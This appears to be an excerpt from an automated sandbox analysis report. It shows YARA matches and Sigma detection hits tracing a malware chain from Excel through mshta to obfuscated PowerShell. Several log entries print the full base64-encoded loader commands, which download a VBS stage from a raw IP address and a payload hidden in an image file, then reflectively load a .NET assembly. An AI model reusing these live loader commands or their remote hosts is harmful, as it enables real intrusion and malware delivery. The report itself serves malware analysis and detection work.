            • 0x66cff:$b2: ::FromBase64String(
            • 0x66d67:$b2: ::FromBase64String(
            • 0x6859a:$b2: ::FromBase64String(
            • 0x68f0d:$b2: ::FromBase64String(
            • 0x16a1:$b3: ::UTF8.GetString(
            • 0x2015:$b3: ::UTF8.GetString(
            • 0x1ce46:$b3: ::UTF8.GetString(
            • 0x1d7b8:$b3: ::UTF8.GetString(
            • 0x26191:$b3: ::UTF8.GetString(
            • 0x325d8:$b3: ::UTF8.GetString(
            • 0x330e5:$b3: ::UTF8.GetString(
            • 0x33a65:$b3: ::UTF8.GetString(

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi
            Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3220, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].hta
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , ProcessId: 4028, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 45.63.94.214, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4028, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgI
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3220, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3516, ProcessName: mshta.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , ProcessId: 4028, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", ProcessId: 3928, ProcessName: csc.exe
